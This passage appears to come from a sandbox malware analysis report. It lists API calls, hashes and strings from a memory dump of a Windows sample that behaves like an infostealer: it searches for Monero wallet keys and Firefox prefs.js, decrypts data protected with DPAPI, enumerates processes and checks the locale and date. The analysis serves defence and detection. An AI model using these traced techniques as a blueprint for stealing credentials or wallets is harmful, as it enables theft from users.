                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: e5ecc11ffa6ab2c8ff5bba05dfe4643207672dba11c1be2dd30eb6eb72e93c93
                              • Instruction ID: 7ec0505d578a628fd99a90c892ebf4b41794f6dc4735573eb5edc745c2fc6655
                              • Opcode Fuzzy Hash: e5ecc11ffa6ab2c8ff5bba05dfe4643207672dba11c1be2dd30eb6eb72e93c93
                              • Instruction Fuzzy Hash: 0AE1F4719211189ADF94FBA0CD52EEE737EAF54300F40419DB50A66492EF306F8ACF96
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A15B8,006A0D96), ref: 0068F71E
                              • StrCmpCA.SHLWAPI(?,006A15BC), ref: 0068F76F
                              • StrCmpCA.SHLWAPI(?,006A15C0), ref: 0068F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0068FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: a4af25c3c67c405287bddf11c2dfa52b9740d175dcb501c6457d8a1d11698648
                              • Instruction ID: 021593f021a61d71e557ff09b409c22fb31e927ab00fb4b9c7473a6f00cb5716
                              • Opcode Fuzzy Hash: a4af25c3c67c405287bddf11c2dfa52b9740d175dcb501c6457d8a1d11698648
                              • Instruction Fuzzy Hash: BBB132719101189BDF64FBA0DD56AED73BEAF54300F4086ACA40A9A541EF306B49CFD6
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A510C,?,?,?,006A51B4,?,?,00000000,?,00000000), ref: 00681923
                              • StrCmpCA.SHLWAPI(?,006A525C), ref: 00681973
                              • StrCmpCA.SHLWAPI(?,006A5304), ref: 00681989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00681D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00681DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00681E20
                              • FindClose.KERNEL32(000000FF), ref: 00681E32
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: cb6631caf2b846da3fdc980ac8c66782e9073ab779c150603b5b179b445cf4a2
                              • Instruction ID: dd5abab29a256707da7e3d01b0d806f1a0b2d88a2566d3903675d3c9eb215ac1
                              • Opcode Fuzzy Hash: cb6631caf2b846da3fdc980ac8c66782e9073ab779c150603b5b179b445cf4a2
                              • Instruction Fuzzy Hash: B5122E719211189BCF59FBA0CD96AEE73BEAF14300F40419DA50A66491EF306F8ACFD5
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006A0C2E), ref: 0068DE5E
                              • StrCmpCA.SHLWAPI(?,006A14C8), ref: 0068DEAE
                              • StrCmpCA.SHLWAPI(?,006A14CC), ref: 0068DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0068E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 27be54cd596a04bf5d78b3720b56190260bae21bee2d7fa1c0df762fd046d4a5
                              • Instruction ID: a064995e11bd5dcad4dca91cc9772bf8e2f66b664f196283bacb1ed496496c92
                              • Opcode Fuzzy Hash: 27be54cd596a04bf5d78b3720b56190260bae21bee2d7fa1c0df762fd046d4a5
                              • Instruction Fuzzy Hash: A2F19E718201289ADF59FBA0CD95EEE73BEBF15300F40419DA40A66491EF306F4ACFA5
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A14B0,006A0C2A), ref: 0068DAEB
                              • StrCmpCA.SHLWAPI(?,006A14B4), ref: 0068DB33
                              • StrCmpCA.SHLWAPI(?,006A14B8), ref: 0068DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0068DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 433a8be4990543e0293c4f55639242e6fe8223f37f1bfbd6e7803fd38c0e559f
                              • Instruction ID: 1885f702fde1be2ad21e59c5c9d8e0cb1d97975ab39737c25087decee4ae7074
                              • Opcode Fuzzy Hash: 433a8be4990543e0293c4f55639242e6fe8223f37f1bfbd6e7803fd38c0e559f
                              • Instruction Fuzzy Hash: 9B91247691010897CF54FBF0ED56DED73BEAB84304F40865CF90A9A581EE349B098BE6
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,006A05AF), ref: 00697BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00697BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00697C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00697C62
                              • LocalFree.KERNEL32(00000000), ref: 00697D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: f2e8da10a320f7758b08bafbb040c12d5f01138541f0c4a651e4727cbbb318bb
                              • Instruction ID: 24adfabde122e360de14caccf88316785634ff75ce80814485fccab7ed03b875
                              • Opcode Fuzzy Hash: f2e8da10a320f7758b08bafbb040c12d5f01138541f0c4a651e4727cbbb318bb
                              • Instruction Fuzzy Hash: A9416C71911218ABDF24DB94DC99FEEB3B9FF44700F204199E00962680DB342F86CFA5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !\K[$%\K[$3Afv$5~u$?k}?$v>v}$`QP
                              • API String ID: 0-2883981944
                              • Opcode ID: 92415575f6d2ae4c253f5c5d5115dac083ded847b47c8f91f9c338647531e6f3
                              • Instruction ID: 47c11132d97b80d5bf6aa092d05761b5896a37bda55f36745b8d2e2598ec9486
                              • Opcode Fuzzy Hash: 92415575f6d2ae4c253f5c5d5115dac083ded847b47c8f91f9c338647531e6f3
                              • Instruction Fuzzy Hash: F4B228F3A082049FE3046E2DEC8577ABBE5EFD4720F1A453DE6C4C7744EA3598018696
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006A0D73), ref: 0068E4A2
                              • StrCmpCA.SHLWAPI(?,006A14F8), ref: 0068E4F2
                              • StrCmpCA.SHLWAPI(?,006A14FC), ref: 0068E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 7c2d8164f1e3646397350be9fc020df652dd3dfb62b6a361584a29807186697b
                              • Instruction ID: 2fba8e828b47acdb7e91d66067ae83d586f60ead7cb5997f52da0cab807e79d6
                              • Opcode Fuzzy Hash: 7c2d8164f1e3646397350be9fc020df652dd3dfb62b6a361584a29807186697b
                              • Instruction Fuzzy Hash: 38123F719201189ADF58FBA0DD96EED73BEAF54300F4041ACB50A96491EE306F49CFD6
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                              • LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: Nh
                              • API String ID: 4291131564-3382845309
                              • Opcode ID: 8335f3246915526a25bdfcc5ab385d56df2e52546049395a429bd0e8e5141240
                              • Instruction ID: 20b5681b6eb2cf211115ae8ff58317b9971f37c4ba18c10548f730eae0796ea6
                              • Opcode Fuzzy Hash: 8335f3246915526a25bdfcc5ab385d56df2e52546049395a429bd0e8e5141240
                              • Instruction Fuzzy Hash: 0111A2B4241208AFEB14CF64DC95FAA77B5FB89704F208158F9159B390C7B6A901CBA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: LW'T$Z'$r2z:$M|w$h[j
                              • API String ID: 0-3466229688
                              • Opcode ID: 49a109f058f6471ac4167a8a2b6056d8a9ea06fee78802d7dc668954072b547c
                              • Instruction ID: e87c5b890f064deb97ac2e6ce0f3997abddcd97b93038e682e417136110ac6f9
                              • Opcode Fuzzy Hash: 49a109f058f6471ac4167a8a2b6056d8a9ea06fee78802d7dc668954072b547c
                              • Instruction Fuzzy Hash: BEA23AF3A0C204AFE3046E2DEC8567AFBE9EBD4320F16463DE6C4C7744E97598058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3{=w$7nN}$>+o}$FjB]$k>
                              • API String ID: 0-4205327788
                              • Opcode ID: 16927b41ad9bd6cf3632e4595f604d5402c0f80ef89d7b62d2958003487fb2a7
                              • Instruction ID: 6da22eb02c71b11e738bcb9847938ffe7cf8dd44a51cea255ff746d4bd809d44
                              • Opcode Fuzzy Hash: 16927b41ad9bd6cf3632e4595f604d5402c0f80ef89d7b62d2958003487fb2a7
                              • Instruction Fuzzy Hash: 06A248F3A0C2109FE7086E2DEC9577ABBE9EF94320F1A453DEAC4C3744E93558058692
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C87C
                              • lstrcat.KERNEL32(?,006A0B46), ref: 0068C943
                              • lstrcat.KERNEL32(?,006A0B47), ref: 0068C957
                              • lstrcat.KERNEL32(?,006A0B4E), ref: 0068C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 20558dc6898a37cefa862cd48c61fc22ce3c54149e4243d92dfb107c19d2db8f
                              • Instruction ID: 137f77f300778fae0aadde817a784046739778a46020b289a42af0b33387a5a2
                              • Opcode Fuzzy Hash: 20558dc6898a37cefa862cd48c61fc22ce3c54149e4243d92dfb107c19d2db8f
                              • Instruction Fuzzy Hash: E64180B590421EDFDB10DFA4DD89FEEB7B9BB48308F1041A8F509A6280D7715A84CFA1
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0069696C
                              • sscanf.NTDLL ref: 00696999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006969B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006969C0
                              • ExitProcess.KERNEL32 ref: 006969DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: dd8fd08e3bf29036c86b7a3cbee9ae25bf2f6a0e0d4030cef12e5d069409d944
                              • Instruction ID: 6e7cda5d7d101a214a419c072a7557b4499b51ecd7e3ef928c82740d747543b4
                              • Opcode Fuzzy Hash: dd8fd08e3bf29036c86b7a3cbee9ae25bf2f6a0e0d4030cef12e5d069409d944
                              • Instruction Fuzzy Hash: 4821BA75D1420DABCF48EFE4D9459EEB7BAFF48304F04852EE506A3250EB345605CBA9
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0068724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00687254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00687281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006872A4
                              • LocalFree.KERNEL32(?), ref: 006872AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 6a4ab68042aaa7825253038fee844226ae2245f9a360a63c96b0e3efb9eeccd1
                              • Instruction ID: 56d658aa4a35a7408f40a0609756564fb7da6a1a03bdcf720c634ddbb690308a
                              • Opcode Fuzzy Hash: 6a4ab68042aaa7825253038fee844226ae2245f9a360a63c96b0e3efb9eeccd1
                              • Instruction Fuzzy Hash: 9B010CB5A40208BBEB14DFE4DD4AF9E77B9FB44B05F204155FB05AA2C0D6B0AA018B65
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0069961E
                              • Process32First.KERNEL32(006A0ACA,00000128), ref: 00699632
                              • Process32Next.KERNEL32(006A0ACA,00000128), ref: 00699647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0069965C
                              • CloseHandle.KERNEL32(006A0ACA), ref: 0069967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: d68793b03f40fa8bb2079b1683165a3639ffc8012501d23cbe74ba3a6d2d1baa
                              • Instruction ID: 4cf59cf971173e686d2d67d1e44692b91e5d194c06c9cac1f3c7731fda5348cc
                              • Opcode Fuzzy Hash: d68793b03f40fa8bb2079b1683165a3639ffc8012501d23cbe74ba3a6d2d1baa
                              • Instruction Fuzzy Hash: B7010C75A00208EBDF14DFA5DD48FEDBBF9FB48704F104198A905A6240D7349B41CF61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2z3w$eC<c$f:o>$m6f
                              • API String ID: 0-1938127671
                              • Opcode ID: f98c1c0fe31fccaf8bddd04f6ab51c48c1e246ee1a1a87ab487378316ceceefe
                              • Instruction ID: 56ca813031df3f6eb1be096d03ffd63deba60e795d0e311d578ba6e5ee714412
                              • Opcode Fuzzy Hash: f98c1c0fe31fccaf8bddd04f6ab51c48c1e246ee1a1a87ab487378316ceceefe
                              • Instruction Fuzzy Hash: 2BB209F3A082049FE7046E2DEC8567AFBE9EF94720F1A493DEAC4C7344E63558158693
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1S$=L1w$W(_$w^dT
                              • API String ID: 0-1958092904
                              • Opcode ID: cc11a19fd53b29870007f7be5a495e773e534913b06d1e73d67ab5f57e1cf6fa
                              • Instruction ID: 8c3dec230b6be7c0fd720bcc441e22325030b094e7f8e16b8c6c400935210de3
                              • Opcode Fuzzy Hash: cc11a19fd53b29870007f7be5a495e773e534913b06d1e73d67ab5f57e1cf6fa
                              • Instruction Fuzzy Hash: 4CB2F5F3A082009FE304AE2DDC8567ABBE5EFD8320F16893DEAC4C7744E63558458697
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00685184,40000001,00000000,00000000,?,00685184), ref: 00698EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: cb028d8be11d2e1af350f668031803bb51d3a86a47b03597ac6a742e26e0b03b
                              • Instruction ID: 29265f49715db882b24fed8d7ff57a692e0bc4efee2fc3374089146fd189ace9
                              • Opcode Fuzzy Hash: cb028d8be11d2e1af350f668031803bb51d3a86a47b03597ac6a742e26e0b03b
                              • Instruction Fuzzy Hash: 8E110A70200208AFDF04CF64D884FA637BEBF8A354F109458F9158B650DB35E842DB60
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0148E458,00000000,?,006A0E10,00000000,?,00000000,00000000), ref: 00697A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00697A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0148E458,00000000,?,006A0E10,00000000,?,00000000,00000000,?), ref: 00697A7D
                              • wsprintfA.USER32 ref: 00697AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
